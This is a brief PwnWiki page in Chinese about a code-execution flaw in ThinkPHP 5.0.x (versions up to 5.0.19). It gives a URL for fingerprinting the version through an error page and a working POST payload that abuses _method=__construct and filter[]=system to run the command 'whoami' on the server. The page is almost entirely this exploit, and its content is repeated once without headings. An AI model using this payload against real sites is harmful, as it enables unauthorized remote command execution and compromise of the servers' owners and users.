ThinkPHP 5.0.13 代碼執行漏洞
From PwnWiki
影響版本
ThinkPHP <= v5.0.19
漏洞利用
通過報錯確定ThinkPHP版本:
http://127.0.0.1/tk5/public/index.php/111
Payload
http://127.0.0.1/tk5/public/index.php
post發送數據:
s=whoami&_method=__construct&method=&filter[]=system
ThinkPHP <= v5.0.19
通過報錯確定ThinkPHP版本:
http://127.0.0.1/tk5/public/index.php/111
http://127.0.0.1/tk5/public/index.php
post發送數據:
s=whoami&_method=__construct&method=&filter[]=system